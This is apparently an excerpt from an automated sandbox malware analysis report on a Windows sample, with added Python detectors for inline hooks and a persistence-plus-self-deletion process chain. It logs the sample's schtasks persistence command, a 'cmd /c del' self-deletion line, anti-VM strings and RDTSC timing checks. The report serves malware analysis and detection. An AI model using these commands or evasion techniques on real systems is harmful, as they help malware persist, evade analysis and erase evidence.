          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_006A93A1 push 0000007Fh; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_006A6D5D push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_006A9E73 push esp; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6C1D3 push esp; retf
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E5627A push ds; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6D56C push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6D502 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6D50B push eax; ret
          Source: initial sample Static PE information: section name: .text entropy: 7.02347259021
          Source: C:\Users\user\Desktop\456yqMyHvT.exe File created: C:\Users\user\AppData\Roaming\dWAzsHjHs.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE1
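The row above records that explorer.exe's copy of user32!PeekMessageA no longer begins with the bytes of the on-disk image, which is how the sandbox detects the inline hook the injected code installs. The Python below is an added example, not part of the report: given an export's address, its prologue bytes from the clean DLL and the bytes read from the live process, it reports whether the function was patched and, for the classic hook shapes (jmp rel32, indirect jmp, push/ret, mov rax/jmp rax), the address control is redirected to. The PeekMessageA entry uses the live bytes from the report; its clean prologue, the addresses and the other two exports are constructed for the example.

```python
"""Detect and classify inline hooks by comparing export prologues.

Added example for this report, not Joe Sandbox code. The report flags
user32!PeekMessageA in explorer.exe with new code 48 8B B8 83 3E E1; the
clean prologue bytes and the addresses below are constructed.
"""
import struct

MASK64 = (1 << 64) - 1


def classify_patch(va, clean, live):
    """Compare an export's on-disk prologue with the bytes read from memory.

    Returns None when unchanged; otherwise the hook shape and, where the
    bytes encode it, the address control is transferred to.
    """
    n = min(len(clean), len(live))
    if clean[:n] == live[:n]:
        return None
    if live[:1] == b"\xe9" and len(live) >= 5:                  # jmp rel32
        rel = struct.unpack("<i", live[1:5])[0]
        return {"kind": "jmp rel32", "target": (va + 5 + rel) & MASK64}
    if live[:2] == b"\xff\x25" and len(live) >= 6:              # jmp [abs] / jmp [rip+disp]
        return {"kind": "jmp indirect", "target": None}
    if live[:1] == b"\x68" and live[5:6] == b"\xc3":             # push imm32; ret
        return {"kind": "push imm32; ret", "target": struct.unpack("<I", live[1:5])[0]}
    if live[:2] == b"\x48\xb8" and live[10:12] == b"\xff\xe0":   # mov rax, imm64; jmp rax
        return {"kind": "mov rax, imm64; jmp rax", "target": struct.unpack("<Q", live[2:10])[0]}
    # Any other divergence is still a patch; keep the raw bytes for the analyst.
    return {"kind": "unrecognized overwrite", "target": None, "bytes": live.hex(" ")}


# (export, VA, prologue from the on-disk image, bytes read from the live process)
SAMPLE_EXPORTS = [
    # Live bytes are the ones the report lists for explorer.exe; the hotpatch
    # prologue 8B FF 55 8B EC and the VA are constructed for the example.
    ("user32!PeekMessageA", 0x7FF8A0001000,
     bytes.fromhex("8bff558bec"), bytes.fromhex("488bb8833ee1")),
    # Constructed: classic 5-byte jmp hook to a trampoline 0xFFB bytes ahead.
    ("user32!GetMessageA", 0x77D01000,
     bytes.fromhex("8bff558bec"), bytes.fromhex("e9fb0f0000")),
    # Constructed: untouched export.
    ("user32!SendMessageA", 0x77D03000,
     bytes.fromhex("8bff558bec"), bytes.fromhex("8bff558bec")),
]


def audit_exports(table):
    """Return [(export, finding)] for every export whose prologue was modified."""
    findings = []
    for name, va, clean, live in table:
        hit = classify_patch(va, clean, live)
        if hit:
            findings.append((name, hit))
    return findings


if __name__ == "__main__":
    for name, hit in audit_exports(SAMPLE_EXPORTS):
        target = f" -> {hit['target']:#x}" if hit["target"] is not None else ""
        print(f"{name}: {hit['kind']}{target}", hit.get("bytes", ""))
```

The PeekMessageA bytes match none of the classic trampoline shapes, so the function reports an unrecognized overwrite and hands back the raw bytes; that is still the finding. The comparison against the on-disk image is what makes the check robust, the shape classifier only adds context, and on a real system the clean bytes must come from the file on disk (with relocations applied), not from another process that may be hooked the same way.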
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
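The process-creation rows earlier in this report, the Boot Survival entry and the deletion row above describe one chain: the sample registers a scheduled task from an XML file in the user's Temp directory, re-launches its own image as the hollowing host, the injected explorer.exe starts a bare WWAHost.exe, and that WWAHost.exe removes the original file through cmd.exe. The Python below is an added detection example, not part of the report: it parses process-creation rows in the report's own format (the chain above is embedded as constructed input, including the row that carries only the cmd arguments) and flags each of those four behaviours. The rule names are this example's own, and the explorer.exe rule is a heuristic that keys on a command line consisting of nothing but the image path.

```python
"""Flag the persistence / hollowing / self-deletion chain in process-creation rows.

Added detection example for this report, not Joe Sandbox code. Rows follow
the report's "Source: <parent image> Process created: <child image> <command line>"
format; one row in the report omits the child image and starts with the
arguments, which the parser tolerates.
"""
import re

ROW_RE = re.compile(r"^Source:\s+(?P<parent>.+?)\s*Process created:\s+(?P<rest>.*)$")
XML_RE = re.compile(r"/xml\s+'([^']+)'", re.I)
DEL_RE = re.compile(r"/c\s+del\s+'?(.+?)'?\s*$", re.I)

# Constructed input: the chain recorded in this report.
SAMPLE_EVENTS = r"""
Source: unknown Process created: C:\Users\user\Desktop\456yqMyHvT.exe 'C:\Users\user\Desktop\456yqMyHvT.exe'
Source: C:\Users\user\Desktop\456yqMyHvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\456yqMyHvT.exe Process created: C:\Users\user\Desktop\456yqMyHvT.exe C:\Users\user\Desktop\456yqMyHvT.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
"""


def parse_events(text):
    """Yield {"parent", "image", "args"}; image is "" when the row lacks it."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        parts = m.group("rest").split(None, 1)
        if parts and parts[0].lower().endswith(".exe"):
            image = parts[0]
            args = parts[1] if len(parts) > 1 else ""
        else:
            image, args = "", m.group("rest")
        yield {"parent": m.group("parent"), "image": image, "args": args}


def classify(ev, sample_path=None):
    """Return the rule names that fire for one process-creation event."""
    parent, image, args = ev["parent"].lower(), ev["image"].lower(), ev["args"]
    base = image.rsplit("\\", 1)[-1]
    hits = []
    # Persistence: schtasks /Create whose /XML definition lives in the user's Temp.
    if base == "schtasks.exe" and "/create" in args.lower():
        m = XML_RE.search(args)
        if m and "\\appdata\\local\\temp\\" in m.group(1).lower():
            hits.append("schtasks_temp_xml")
    # Hollowing host: a process starts a second copy of its own image.
    if image and image == parent:
        hits.append("self_relaunch")
    # Heuristic: injected explorer.exe starting a bare 32-bit system binary.
    bare = args.strip().strip("'").lower() == image
    if parent.endswith("\\explorer.exe") and "\\syswow64\\" in image and bare:
        hits.append("explorer_bare_syswow64_child")
    # Anti-forensics: cmd /c del of an executable, possibly the sample itself.
    if base == "cmd.exe" or not image:
        m = DEL_RE.search(args)
        if m:
            hits.append("cmd_del")
            if sample_path and m.group(1).lower() == sample_path.lower():
                hits.append("self_delete_sample")
    return hits


def triage(text, sample_path=None):
    """Events with at least one finding, in report order."""
    out = []
    for ev in parse_events(text):
        hits = classify(ev, sample_path)
        if hits:
            out.append({**ev, "findings": hits})
    return out


if __name__ == "__main__":
    for ev in triage(SAMPLE_EVENTS, sample_path=r"C:\Users\user\Desktop\456yqMyHvT.exe"):
        print(ev["parent"], "->", ev["image"] or ev["args"], ":", ", ".join(ev["findings"]))
```

The two conhost.exe rows produce no finding, the schtasks, self-relaunch and explorer.exe rows one each, and both deletion rows fire cmd_del plus self_delete_sample once the analysed sample's path is supplied. In a real pipeline the same rules apply to Sysmon event ID 1 or EDR process-creation telemetry, where the parent image and full command line are present in the event rather than recovered from a text row.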
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 0.2.456yqMyHvT.exe.31e8228.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: 456yqMyHvT.exe PID: 6332, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\456yqMyHvT.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E59904 second address: 0000000000E5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E59B7E second address: 0000000000E59B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exe TID: 5152Thread sleep time: -40654s >= -30000s
          Source: C:\Users\user\Desktop\456yqMyHvT.exe TID: 6500Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread delayed: delay time: 40654
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread delayed: delay time: 922337203685477
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.756041921.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.738797128.000000000FD31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-B744-2::
          Source: explorer.exe, 00000008.00000000.786936792.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.756041921.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.756187684.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000008.00000000.718220664.000000000FD71000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}))
          Source: explorer.exe, 00000008.00000000.706978186.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000008.00000000.756187684.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000000.756280880.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3D5E0 mov eax, dword ptr fs:[00000030h]
